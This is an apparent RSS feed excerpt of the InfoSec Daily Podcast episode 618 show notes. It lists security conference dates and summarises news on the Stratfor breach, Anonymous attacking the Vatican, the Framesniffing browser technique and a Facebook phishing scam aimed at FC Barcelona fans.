<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>&nbsp;</p>
<h5 dir="ltr"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></h5>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 23 &#8211; 24, 2012</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Black Hat Vegas</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Defcon 20</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 26-29, 2012</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Rio Hotel and Casino &#8211; Las Vegas, NV</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://defcon.org/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://defcon.org/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP &amp; Room reservations now open!</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://news.cnet.com/8301-1009_3-57395944-83/fbi-says-$700k-charged-in-anonymous-stratfor-attack/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.cnet.com/8301-1009_3-57395944-83/fbi-says-$700k-charged-in-anonymous-stratfor-attack/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">During the court case for Jeremy Hammond&#8211;the Antisec hacker busted for stealing data in the Stratfor breach&#8211;the FBI says charges made with stolen credit card information equals $700,000.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When the Antisec branch of Anonymous</span><a href="http://news.cnet.com/8301-1009_3-57348995-83/report-details-extent-of-anonymous-hack-on-stratfor/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">hacked into security think tank</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Strategic Forecasting, or Stratfor, at the end of December, one of its claims was the theft 200GB worth of data, including e-mails and clients&#39; credit card information.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Days after the hack, the group published 860,000 e-mail addresses and 75,000 unencrypted credit card numbers on the Web.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Now, the FBI&#39;s Milan Patel says that between December 6, 2011, and February 2012, &quot;at least $700,000 worth of unauthorized charges were made to credit card accounts that were among those stolen during the Stratfor Hack,&quot; according to Internet security news site Security Week.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Stratfor&#39;s list of clients whose information was allegedly compromised in the hack includes the U.S. Army, U.S. Air Force, Department of Defense, Lockheed Martin, and Bank of America.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Patel said that the $700,000 figure &quot;does not reflect any of the charges that may have been incurred on cards associated with the Stratfor Hack for which records have not yet been reviewed.&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.zdnet.com/blog/security/anonymous-hacks-vatican-again/10721"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.zdnet.com/blog/security/anonymous-hacks-vatican-again/10721</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The hacktivist group Anonymous has taken down the Vatican&rsquo;s website for a second time. The attack is part of the organization&rsquo;s recent declaration of war against religion. </span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size: 13px; font-family: Verdana; color: rgb(0, 0, 0); background-color: rgb(255, 255, 255); font-weight: normal; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline;">&nbsp;&nbsp;&nbsp; </span><img height="80px;" src="https://lh4.googleusercontent.com/qDKKcUipqHEBEadLV0KJI7O5o3KbF5UOiiOVVbfqVRa-Tc5rNzK2ur1ylcMB725G-b-Drik7590Gc8UUgwFx68s251O6a5jWsI5j5betZxuh71QAazc" width="640px;" /></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anonymous has hacked the Vatican for a second time. The website for the Catholic Church, vatican.va, is currently down. Unlike the first hack, which appeared to be a typical Distributed Denial of Service (DDoS) attack, this one is more than just taking down the website. The main target of the new strike is Vatican Radio, and today&rsquo;s attack is possible because of a backdoor Anonymous created for itself the first time around.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Once again, Anonymous&rsquo; Italian members are the ones behind this particular siege. A</span><a href="http://pastebin.com/r4khdyvj"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> Pastebin</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> post details what Anonymous wants from the Vatican. It is written entirely in Italian, the only exception being the group&rsquo;s signature:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We are Anonymous</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We are Legion</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We don&rsquo;t forgive</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We don&rsquo;t forget</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Expect Us!</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In short, the message says the Vatican&rsquo;s systems are less secure than the Church may think. While everyone was focused on the site being down, Anonymous decided to penetrate the systems further than just your average DDoS attack, which typically overloads a website with requests.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.contextis.co.uk/research/blog/framesniffing/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.contextis.co.uk/research/blog/framesniffing/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A great blog posting describes the Framesniffing technique and show how it can be used by a remote attacker to steal sensitive information from users through their web browser. I&#39;ll demonstrate how this attack can be used to mine information from documents stored in a corporate SharePoint installation. This blog post also contains a demo that shows how information can be extracted from a user&rsquo;s LinkedIn account using the same technique. Finally, I&rsquo;ll explain how to protect your site against this kind of attack. &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; </span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The video below shows a fictional but realistic example of how this technique could be used to carry out corporate espionage.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The video shows an attacker extracting sensitive information (including client names) from a fictional corporate SharePoint installation. The attacker then searches the server to discover crucial information about upcoming acquisition. To achieve this, the attacker first lures a user with access to the SharePoint server to a malicious web page. While the user is viewing the page, the attacker uses Framesniffing to infer information from the SharePoint server through their web browser.&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; </span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Framesniffing technique uses an HTML IFRAME to load a target website inside of an attacker&#39;s webpage. All web browsers have security restrictions that prevent a webpage from directly reading the contents of pages loaded in frames. However, this attack bypasses those measures, allowing a malicious webpage to read certain pieces of information about the structure of a framed page, by using anchor elements. Before I describe the attack itself, here&#39;s a quick explanation of how anchors work.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://news.softpedia.com/news/FC-Barcelona-Fans-Targeted-in-Facebook-Phishing-Scam-258271.shtml"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.softpedia.com/news/FC-Barcelona-Fans-Targeted-in-Facebook-Phishing-Scam-258271.shtml</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cybercriminals devised a clever way to steal Facebook login credentials from unsuspecting users. They designed a phishing site that urges potential victims to enter their social media credentials in order to gain access to a lot of great content related to FC Barcelona.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">FC Barcelona is one of the most successful football clubs in the world, millions of people worldwide admiring its achievements and its talented players such as Lionel Messi, Carles Puyol, Gerard Pique, or Francesc Fabregas.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Phishers started relying on the club&rsquo;s fame and created a fake website called Facebook F.C.B, which contains a picture of one of the players and the organization&rsquo;s official logo, Symantec</span><a href="http://www.symantec.com/connect/blogs/scam-fc-barcelona-fans"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> reports</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The middle of the webpage displays a couple of textboxes where a Facebook username and a password can be entered.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Once the unsuspecting user enters his credentials, he is automatically redirected to the official FC Barcelona Facebook page. Of course, at this point the sensitive data is already stored safely in a database controlled by the crooks, the redirect to the legitimate page being made with the purpose of creating the illusion of a valid login.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The chances for an Internet user to end up on this, or any other phishing site, without any interaction are slim. This is why internauts are advised never to click on suspicious links found in unsolicited emails or posts from social media sites. </span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-618-stratfor-700k-vatican-again-framesniffing-and-fc-barcelona/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3633/0/infosec-daily-podcast-episode-618.mp3" length="17285833" type="audio/mpeg" />
		<itunes:duration>0:35:58</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 618 for March 13, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Themson Mester. &#160;Special Guest Co-Host Varun Sharma.
&#160;
Announcements:
How to Rob a Bank in 3[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 618 for March 13, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Themson Mester. &#160;Special Guest Co-Host Varun Sharma.
&#160;
Announcements:
How to Rob a Bank in 30 Days or less
When: March 14th 2012
Where: http://securityzone.co/webinar-en.html
Sign up for the webinar that will probably get b0n3z on that watchlist
&#160;
Social Engineering Training
When: July 21-24, 2012
	Where: Black Hat Vegas
When: August 20-24, 2012
Where: &#160;Bristol, UK
When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
http://www.social-engineer.com/social-engineer-training
&#160;
InfoSec Southwest
When: March 30-April 1
Where: Austin, TX
http://www.Infosecsouthwest.com
&#160;
Linuxfest Northwest 2012
When: Saturday, April 28th-29th, 2012
Where: Bellingham Technical College &#8211; Bellingham, WA
http://www.linuxfestnorthwest.org/
CFP now open!
&#160;
AIDE 2012
When: May 21-25, 2012
Where: MU Forensic Science Center
Huntington, West Virginia
http://aide.marshall.edu
&#160;
LayerOne 2012
When: May 26-27, 2012
Where: Clarion Hotel &#8211; Anaheim, CA
http://www.layerone.org
CFP now open!
&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
Where: Courtyard Seattle Federal Way, WA http://www.sans.org/mentor/details.php?nid=28014
&#160;
Inside and Out of the Social-Engineer Toolkit (SET)
When: July 21 &#8211; 22, 2012
When: July 23 &#8211; 24, 2012
Where: Black Hat Vegas
http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
&#160;
Defcon 20
When: July 26-29, 2012
Where: Rio Hotel and Casino &#8211; Las Vegas, NV
http://defcon.org/
CFP &#38; Room reservations now open!
&#160;
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
When: &#160;September 27-30, 2012
Where: Louisville, KY
http://www.derbycon.com
&#160;
Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
&#160;
You don't have a sufficient version of Flash Player to display this animation.
&#160;
Stories
Source: &#160;http://news.cnet.com/8301-1009_3-57395944-83/fbi-says-$700k-charged-in-anonymous-stratfor-attack/
During the court case for Jeremy Hammond&#8211;the Antisec hacker busted for stealing data in the Stratfor breach&#8211;the FBI says charges made with stolen credit card information equals $700,000.
When the Antisec branch of Anonymous hacked into security think tank Strategic Forecasting, or Stratfor, at the end of December, one of its claims was the theft 200GB worth of data, including e-mails and clients&#39; credit card information.
Days after the hack, the group published 860,000 e-mail addresses and 75,000 unencrypted credit card numbers on the Web.
Now, the FBI&#39;s Milan Patel says that between December 6, 2011, and February 2012, &#34;at least $700,000 worth of unauthorized charges were made to credit card accounts that were among those stolen during the Stratfor Hack,&#34; according to Internet security news site Security Week.
Stratfor&#39;s list of clients whose information was allegedly compromised in the hack includes the U.S. Army, U.S. Air Force, Department of Defense, Lockheed Martin, and Bank of America.
Patel said that the $700,000 figure &#34;does not reflect any of the charges that may have been incurred on cards associated with the Stratfor Hack for which records have not yet been reviewed.&#34;
&#8230;.
Source: &#160;http://www.zdnet.com/blog/security/anonymous-hacks-vatican-again/10721
The hacktivist group Anonymous has taken down the Vatican&#8217;s website for a second time. The attack is part of the organization&#8217;s recent declaration of war against religion. 
&#160;&#160;&#160; 
Anonymous has hacked the Vatican for a second time. The website fo[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 617 &#8211; FourSquare Badge, IR Toolsets, Kelihos and DNS Amplification Attacks</title>
		<link>http://www.isdpodcast.com/episode-617-foursquare-badge-ir-toolsets-kelihos-and-dns-amplification-attacks</link>
		<comments>http://www.isdpodcast.com/episode-617-foursquare-badge-ir-toolsets-kelihos-and-dns-amplification-attacks#comments</comments>
